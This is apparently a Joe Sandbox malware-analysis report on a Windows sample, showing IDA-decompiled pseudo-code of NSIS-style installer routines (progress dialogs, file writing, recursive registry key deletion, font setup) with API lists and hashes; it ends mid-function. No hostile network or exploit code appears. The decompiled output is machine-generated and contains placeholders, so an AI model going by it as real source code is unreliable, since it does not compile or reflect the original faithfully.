                            			E0040302E(intOrPtr _a4) {
				short _v132;
				long _t6;
				struct HWND__* _t7;
				struct HWND__* _t15;

				if(_a4 != 0) {
					_t15 =  *0x420efc;
					if(_t15 != 0) {
						_t15 = DestroyWindow(_t15);
					}
					 *0x420efc = 0;
					return _t15;
				}
				if( *0x420efc != 0) {
					return E00406A71(0);
				}
				_t6 = GetTickCount();
				if(_t6 >  *0x42a26c) {
					if( *0x42a268 == 0) {
						_t7 = CreateDialogParamW( *0x42a260, 0x6f, 0, E00402F93, 0);
						 *0x420efc = _t7;
						return ShowWindow(_t7, 5);
					}
					if(( *0x42a314 & 0x00000001) != 0) {
						wsprintfW( &_v132, L"... %d%%", E00403012());
						return E004056CA(0,  &_v132);
					}
				}
				return _t6;
			}







                            0x0040303d
                            0x0040303f
                            0x00403046
                            0x00403049
                            0x00403049
                            0x0040304f
                            0x00000000
                            0x0040304f
                            0x0040305d
                            0x00000000
                            0x00403060
                            0x00403067
                            0x00403073
                            0x0040307b
                            0x004030b9
                            0x004030c2
                            0x00000000
                            0x004030c7
                            0x00403084
                            0x00403095
                            0x00000000
                            0x004030a3
                            0x00403084
                            0x004030cf

                            APIs
                            • DestroyWindow.USER32(?,00000000), ref: 00403049
                            • GetTickCount.KERNEL32 ref: 00403067
                            • wsprintfW.USER32 ref: 00403095
                              • Part of subcall function 004056CA: lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                              • Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                              • Part of subcall function 004056CA: lstrcatW.KERNEL32(00422728,004030A8), ref: 00405725
                              • Part of subcall function 004056CA: SetWindowTextW.USER32(00422728,00422728), ref: 00405737
                              • Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                              • Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                              • Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                            • CreateDialogParamW.USER32 ref: 004030B9
                            • ShowWindow.USER32(00000000,00000005), ref: 004030C7
                              • Part of subcall function 00403012: MulDiv.KERNEL32(?,00000064,?), ref: 00403027
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.322657168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.322651210.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322670175.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322773729.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_YSpCB8DEek.jbxd
                            Similarity
                            • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                            • String ID: ... %d%%
                            • API String ID: 722711167-2449383134
                            • Opcode ID: a65563718f57099a27635650194dd277da09fbe66beefc8d93bb4be83c5e7891
                            • Instruction ID: 5af6bf9b0b70cf9307c1258d0e5a667b07be53d22b58a3258066d7aee54b172b
                            • Opcode Fuzzy Hash: a65563718f57099a27635650194dd277da09fbe66beefc8d93bb4be83c5e7891
                            • Instruction Fuzzy Hash: E8018E70553614DBC7317F60AE08A5A3EACAB00F06F54457AF841B21E9DAB84645CBAE
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00404F7F Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E00404F7F(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageW(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageW(_t28, 0x113e, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageW(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}














                            0x00404f8d
                            0x00404f9a
                            0x00404fa0
                            0x00404fde
                            0x00404fde
                            0x00404fed
                            0x00404ff4
                            0x00000000
                            0x00404ff6
                            0x00404fa2
                            0x00404fb1
                            0x00404fb9
                            0x00404fbc
                            0x00404fce
                            0x00404fd4
                            0x00404fdb
                            0x00000000
                            0x00404fdb
                            0x00000000

                            APIs
                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404F9A
                            • GetMessagePos.USER32 ref: 00404FA2
                            • ScreenToClient.USER32 ref: 00404FBC
                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404FCE
                            • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404FF4
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.322657168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.322651210.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322670175.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322773729.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_YSpCB8DEek.jbxd
                            Similarity
                            • API ID: Message$Send$ClientScreen
                            • String ID: f
                            • API String ID: 41195575-1993550816
                            • Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                            • Instruction ID: ce4c7d6d39dceca23aa6ebdb29af7737867007859e7bede0b388bd4d525dd41f
                            • Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                            • Instruction Fuzzy Hash: 3C014C71940219BADB00DBA4DD85BFEBBB8AF54711F10012BBB50B61C0D6B49A058BA5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00402F93 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E00402F93(struct HWND__* _a4, intOrPtr _a8) {
				short _v132;
				void* _t11;
				WCHAR* _t19;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t11 = E00403012();
					_t19 = L"unpacking data: %d%%";
					if( *0x42a270 == 0) {
						_t19 = L"verifying installer: %d%%";
					}
					wsprintfW( &_v132, _t19, _t11);
					SetWindowTextW(_a4,  &_v132);
					SetDlgItemTextW(_a4, 0x406,  &_v132);
				}
				return 0;
			}






                            0x00402fa3
                            0x00402fb1
                            0x00402fb7
                            0x00402fb7
                            0x00402fc5
                            0x00402fc7
                            0x00402fd3
                            0x00402fd8
                            0x00402fda
                            0x00402fda
                            0x00402fe5
                            0x00402ff5
                            0x00403007
                            0x00403007
                            0x0040300f

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.322657168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.322651210.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322670175.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322773729.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_YSpCB8DEek.jbxd
                            Similarity
                            • API ID: Text$ItemTimerWindowwsprintf
                            • String ID: unpacking data: %d%%$verifying installer: %d%%
                            • API String ID: 1451636040-1158693248
                            • Opcode ID: b65fa6b26e28fa793ab4966251e07a6fe500b79f9b1e2f9c66e5bc42e84335f7
                            • Instruction ID: 34ad84b97f90b05cf42cbebec4ee1aaae98efe268bf46a139428006d78f28757
                            • Opcode Fuzzy Hash: b65fa6b26e28fa793ab4966251e07a6fe500b79f9b1e2f9c66e5bc42e84335f7
                            • Instruction Fuzzy Hash: 25F0497050020DABEF246F60DD49BEA3B69FB00309F00803AFA05B51D0DFBD9A559F59
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00402950 Relevance: 9.1, APIs: 6, Instructions: 91memoryfileCOMMON
                            Download Yara Rule
                            C-Code - Quality: 93%
                            			E00402950(void* __ebx) {
				WCHAR* _t26;
				void* _t29;
				long _t37;
				void* _t49;
				void* _t52;
				void* _t54;
				void* _t56;
				void* _t59;
				void* _t60;
				void* _t61;

				_t49 = __ebx;
				_t52 = 0xfffffd66;
				_t26 = E00402DA6(0xfffffff0);
				_t55 = _t26;
				 *(_t61 - 0x40) = _t26;
				if(E00405FAE(_t26) == 0) {
					E00402DA6(0xffffffed);
				}
				E00406133(_t55);
				_t29 = E00406158(_t55, 0x40000000, 2);
				 *(_t61 + 8) = _t29;
				if(_t29 != 0xffffffff) {
					 *(_t61 - 0x38) =  *(_t61 - 0x2c);
					if( *(_t61 - 0x28) != _t49) {
						_t37 =  *0x42a274;
						 *(_t61 - 0x44) = _t37;
						_t54 = GlobalAlloc(0x40, _t37);
						if(_t54 != _t49) {
							E004035F8(_t49);
							E004035E2(_t54,  *(_t61 - 0x44));
							_t59 = GlobalAlloc(0x40,  *(_t61 - 0x28));
							 *(_t61 - 0x10) = _t59;
							if(_t59 != _t49) {
								E00403371(_t51,  *(_t61 - 0x2c), _t49, _t59,  *(_t61 - 0x28));
								while( *_t59 != _t49) {
									_t51 =  *_t59;
									_t60 = _t59 + 8;
									 *(_t61 - 0x3c) =  *_t59;
									E00406113( *((intOrPtr*)(_t59 + 4)) + _t54, _t60,  *_t59);
									_t59 = _t60 +  *(_t61 - 0x3c);
								}
								GlobalFree( *(_t61 - 0x10));
							}
							E0040620A( *(_t61 + 8), _t54,  *(_t61 - 0x44));
							GlobalFree(_t54);
							 *(_t61 - 0x38) =  *(_t61 - 0x38) | 0xffffffff;
						}
					}
					_t52 = E00403371(_t51,  *(_t61 - 0x38),  *(_t61 + 8), _t49, _t49);
					CloseHandle( *(_t61 + 8));
				}
				_t56 = 0xfffffff3;
				if(_t52 < _t49) {
					_t56 = 0xffffffef;
					DeleteFileW( *(_t61 - 0x40));
					 *((intOrPtr*)(_t61 - 4)) = 1;
				}
				_push(_t56);
				E00401423();
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t61 - 4));
				return 0;
			}













                            0x00402950
                            0x00402952
                            0x00402957
                            0x0040295c
                            0x0040295f
                            0x00402969
                            0x0040296d
                            0x0040296d
                            0x00402973
                            0x00402980
                            0x00402988
                            0x0040298b
                            0x00402997
                            0x0040299a
                            0x004029a0
                            0x004029ae
                            0x004029b3
                            0x004029b7
                            0x004029ba
                            0x004029c3
                            0x004029cf
                            0x004029d3
                            0x004029d6
                            0x004029e0
                            0x004029ff
                            0x004029e7
                            0x004029ec
                            0x004029f4
                            0x004029f7
                            0x004029fc
                            0x004029fc
                            0x00402a06
                            0x00402a06
                            0x00402a13
                            0x00402a19
                            0x00402a1f
                            0x00402a1f
                            0x004029b7
                            0x00402a33
                            0x00402a35
                            0x00402a35
                            0x00402a3f
                            0x00402a40
                            0x00402a44
                            0x00402a48
                            0x00402a4e
                            0x00402a4e
                            0x00402a55
                            0x004022f1
                            0x00402c2d
                            0x00402c39

                            APIs
                            • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B1
                            • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029CD
                            • GlobalFree.KERNEL32 ref: 00402A06
                            • GlobalFree.KERNEL32 ref: 00402A19
                            • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A35
                            • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A48
                            Memory Dump Source
                            • Source File: 00000000.00000002.322657168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.322651210.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322670175.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322773729.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_YSpCB8DEek.jbxd
                            Similarity
                            • API ID: Global$AllocFree$CloseDeleteFileHandle
                            • String ID:
                            • API String ID: 2667972263-0
                            • Opcode ID: cc682eb677fc0cdddcbf9664361c627099a0f91e8e9c012db3e8b517a211182c
                            • Instruction ID: 78b93316678d616cb595922dcd62a83f4062aa2fb33f08fb70827f98fa9650ab
                            • Opcode Fuzzy Hash: cc682eb677fc0cdddcbf9664361c627099a0f91e8e9c012db3e8b517a211182c
                            • Instruction Fuzzy Hash: E131B171D00124BBCF216FA9CE89D9EBE79AF09364F10023AF461762E1CB794D429B58
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00404E71 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84stringCOMMON
                            Download Yara Rule
                            C-Code - Quality: 77%
                            			E00404E71(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v68;
				char _v132;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t23;
				signed int _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t44;
				signed int _t46;
				signed int _t50;
				signed int _t52;
				signed int _t53;
				signed int _t55;

				_t23 = _a16;
				_t53 = _a12;
				_t44 = 0xffffffdc;
				if(_t23 == 0) {
					_push(0x14);
					_pop(0);
					_t24 = _t53;
					if(_t53 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t44 = 0xffffffdd;
					}
					if(_t53 < 0x400) {
						_t44 = 0xffffffde;
					}
					if(_t53 < 0xffff3333) {
						_t52 = 0x14;
						asm("cdq");
						_t24 = 1 / _t52 + _t53;
					}
					_t25 = _t24 & 0x00ffffff;
					_t55 = _t24 >> 0;
					_t46 = 0xa;
					_t50 = ((_t24 & 0x00ffffff) + _t25 * 4 + (_t24 & 0x00ffffff) + _t25 * 4 >> 0) % _t46;
				} else {
					_t55 = (_t23 << 0x00000020 | _t53) >> 0x14;
					_t50 = 0;
				}
				_t31 = E004066A5(_t44, _t50, _t55,  &_v68, 0xffffffdf);
				_t33 = E004066A5(_t44, _t50, _t55,  &_v132, _t44);
				_t34 = E004066A5(_t44, _t50, 0x423748, 0x423748, _a8);
				wsprintfW(_t34 + lstrlenW(0x423748) * 2, L"%u.%u%s%s", _t55, _t50, _t33, _t31);
				return SetDlgItemTextW( *0x429238, _a4, 0x423748);
			}



















                            0x00404e7a
                            0x00404e7f
                            0x00404e87
                            0x00404e88
                            0x00404e95
                            0x00404e9d
                            0x00404e9e
                            0x00404ea0
                            0x00404ea2
                            0x00404ea4
                            0x00404ea7
                            0x00404ea7
                            0x00404eae
                            0x00404eb4
                            0x00404eb4
                            0x00404ebb
                            0x00404ec2
                            0x00404ec5
                            0x00404ec8
                            0x00404ec8
                            0x00404ecc
                            0x00404edc
                            0x00404ede
                            0x00404ee1
                            0x00404e8a
                            0x00404e8a
                            0x00404e91
                            0x00404e91
                            0x00404ee9
                            0x00404ef4
                            0x00404f0a
                            0x00404f1b
                            0x00404f37

                            APIs
                            • lstrlenW.KERNEL32(00423748,00423748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F12
                            • wsprintfW.USER32 ref: 00404F1B
                            • SetDlgItemTextW.USER32 ref: 00404F2E
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.322657168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.322651210.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322670175.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322773729.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_YSpCB8DEek.jbxd
                            Similarity
                            • API ID: ItemTextlstrlenwsprintf
                            • String ID: %u.%u%s%s$H7B
                            • API String ID: 3540041739-107966168
                            • Opcode ID: 9c55475845004576d56970086a3160dc1853a6ea3782dd039902276dcfc99cf4
                            • Instruction ID: 20619224473e8c08b4fba53027c62ddcf1c3fef784a2ba69f514aa474de30786
                            • Opcode Fuzzy Hash: 9c55475845004576d56970086a3160dc1853a6ea3782dd039902276dcfc99cf4
                            • Instruction Fuzzy Hash: 1A11D8736041283BDB00A5ADDC45E9F3298AB81338F150637FA26F61D1EA79882182E8
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00402EA9 Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON
                            Download Yara Rule
                            C-Code - Quality: 48%
                            			E00402EA9(void* __eflags, void* _a4, short* _a8, signed int _a12) {
				void* _v8;
				int _v12;
				short _v536;
				void* _t27;
				signed int _t33;
				intOrPtr* _t35;
				signed int _t45;
				signed int _t46;
				signed int _t47;

				_t46 = _a12;
				_t47 = _t46 & 0x00000300;
				_t45 = _t46 & 0x00000001;
				_t27 = E004064D5(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8);
				if(_t27 == 0) {
					if((_a12 & 0x00000002) == 0) {
						L3:
						_push(0x105);
						_push( &_v536);
						_push(0);
						while(RegEnumKeyW(_v8, ??, ??, ??) == 0) {
							__eflags = _t45;
							if(__eflags != 0) {
								L10:
								RegCloseKey(_v8);
								return 0x3eb;
							}
							_t33 = E00402EA9(__eflags, _v8,  &_v536, _a12);
							__eflags = _t33;
							if(_t33 != 0) {
								break;
							}
							_push(0x105);
							_push( &_v536);
							_push(_t45);
						}
						RegCloseKey(_v8);
						_t35 = E00406A35(3);
						if(_t35 != 0) {
							return  *_t35(_a4, _a8, _t47, 0);
						}
						return RegDeleteKeyW(_a4, _a8);
					}
					_v12 = 0;
					if(RegEnumValueW(_v8, 0,  &_v536,  &_v12, 0, 0, 0, 0) != 0x103) {
						goto L10;
					}
					goto L3;
				}
				return _t27;
			}












                            0x00402eb4
                            0x00402ebd
                            0x00402ec6
                            0x00402ed2
                            0x00402edb
                            0x00402ee5
                            0x00402f0a
                            0x00402f10
                            0x00402f15
                            0x00402f16
                            0x00402f46
                            0x00402f1f
                            0x00402f21
                            0x00402f71
                            0x00402f74
                            0x00000000
                            0x00402f7a
                            0x00402f30
                            0x00402f35
                            0x00402f37
                            0x00000000
                            0x00000000
                            0x00402f3f
                            0x00402f44
                            0x00402f45
                            0x00402f45
                            0x00402f52
                            0x00402f5a
                            0x00402f61
                            0x00000000
                            0x00402f8a
                            0x00000000
                            0x00402f69
                            0x00402ef5
                            0x00402f08
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00402f08
                            0x00402f90

                            APIs
                            • RegEnumValueW.ADVAPI32 ref: 00402EFD
                            • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F49
                            • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F52
                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F69
                            • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F74
                            Memory Dump Source
                            • Source File: 00000000.00000002.322657168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.322651210.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322670175.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322773729.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_YSpCB8DEek.jbxd
                            Similarity
                            • API ID: CloseEnum$DeleteValue
                            • String ID:
                            • API String ID: 1354259210-0
                            • Opcode ID: 2f5760c81b9bdb573da93a40119b3bcbbfe2770e9a6cbc48a05e82d61b54c679
                            • Instruction ID: 37c7ba0f9c491dd7f389852fcb35a119484072d927876f68e32cbd91f0a54eef
                            • Opcode Fuzzy Hash: 2f5760c81b9bdb573da93a40119b3bcbbfe2770e9a6cbc48a05e82d61b54c679
                            • Instruction Fuzzy Hash: 6D216B7150010ABBDF11AF94CE89EEF7B7DEB50384F110076F909B21E0D7B49E54AA68
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00401D81 Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON
                            Download Yara Rule
                            C-Code - Quality: 77%
                            			E00401D81(void* __ebx, void* __edx) {
				struct HWND__* _t30;
				WCHAR* _t38;
				void* _t48;
				void* _t53;
				signed int _t55;
				signed int _t60;
				long _t63;
				void* _t65;

				_t53 = __ebx;
				if(( *(_t65 - 0x23) & 0x00000001) == 0) {
					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x28));
				} else {
					E00402D84(2);
					 *((intOrPtr*)(__ebp - 0x10)) = __edx;
				}
				_t55 =  *(_t65 - 0x24);
				 *(_t65 + 8) = _t30;
				_t60 = _t55 & 0x00000004;
				 *(_t65 - 0x38) = _t55 & 0x00000003;
				 *(_t65 - 0x18) = _t55 >> 0x1f;
				 *(_t65 - 0x40) = _t55 >> 0x0000001e & 0x00000001;
				if((_t55 & 0x00010000) == 0) {
					_t38 =  *(_t65 - 0x2c) & 0x0000ffff;
				} else {
					_t38 = E00402DA6(0x11);
				}
				 *(_t65 - 0x44) = _t38;
				GetClientRect( *(_t65 + 8), _t65 - 0x60);
				asm("sbb esi, esi");
				_t63 = LoadImageW( ~_t60 &  *0x42a260,  *(_t65 - 0x44),  *(_t65 - 0x38),  *(_t65 - 0x58) *  *(_t65 - 0x18),  *(_t65 - 0x54) *  *(_t65 - 0x40),  *(_t65 - 0x24) & 0x0000fef0);
				_t48 = SendMessageW( *(_t65 + 8), 0x172,  *(_t65 - 0x38), _t63);
				if(_t48 != _t53 &&  *(_t65 - 0x38) == _t53) {
					DeleteObject(_t48);
				}
				if( *((intOrPtr*)(_t65 - 0x30)) >= _t53) {
					_push(_t63);
					E004065AF();
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t65 - 4));
				return 0;
			}











                            0x00401d81
                            0x00401d85
                            0x00401d9a
                            0x00401d87
                            0x00401d89
                            0x00401d8f
                            0x00401d8f
                            0x00401da0
                            0x00401da3
                            0x00401dad
                            0x00401db0
                            0x00401db8
                            0x00401dc9
                            0x00401dcc
                            0x00401dd7
                            0x00401dce
                            0x00401dd0
                            0x00401dd0
                            0x00401ddb
                            0x00401de5
                            0x00401e0c
                            0x00401e1b
                            0x00401e29
                            0x00401e31
                            0x00401e39
                            0x00401e39
                            0x00401e42
                            0x00401e48
                            0x00402ba4
                            0x00402ba4
                            0x00402c2d
                            0x00402c39

                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.322657168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.322651210.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322670175.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322773729.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_YSpCB8DEek.jbxd
                            Similarity
                            • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                            • String ID:
                            • API String ID: 1849352358-0
                            • Opcode ID: 100b3177012869429c2005611ce111630833f28d1ab152a2d5a2575cfc39775b
                            • Instruction ID: 4d725fdcf847a80329c23b38d7164c003567f542edd6fcacfb34c9ebeef40da9
                            • Opcode Fuzzy Hash: 100b3177012869429c2005611ce111630833f28d1ab152a2d5a2575cfc39775b
                            • Instruction Fuzzy Hash: 67212672904119AFCB05CBA4DE45AEEBBB5EF08304F14003AF945F62A0CB389951DB98
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00401E4E Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                            Download Yara Rule
                            C-Code - Quality: 73%
                            			E00401E4E(intOrPtr __edx) {
				void* __edi;
				int _t9;
				signed char _t15;
				struct HFONT__* _t18;
				intOrPtr _t30;
				void* _t31;
				struct HDC__* _t33;
				void* _t35;

				_t30 = __edx;
				_t33 = GetDC( *(_t35 - 8));
				_t9 = E00402D84(2);
				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
				0x40cdf8->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t33, 0x5a), 0x48));
				ReleaseDC( *(_t35 - 8), _t33);
				 *0x40ce08 = E00402D84(3);
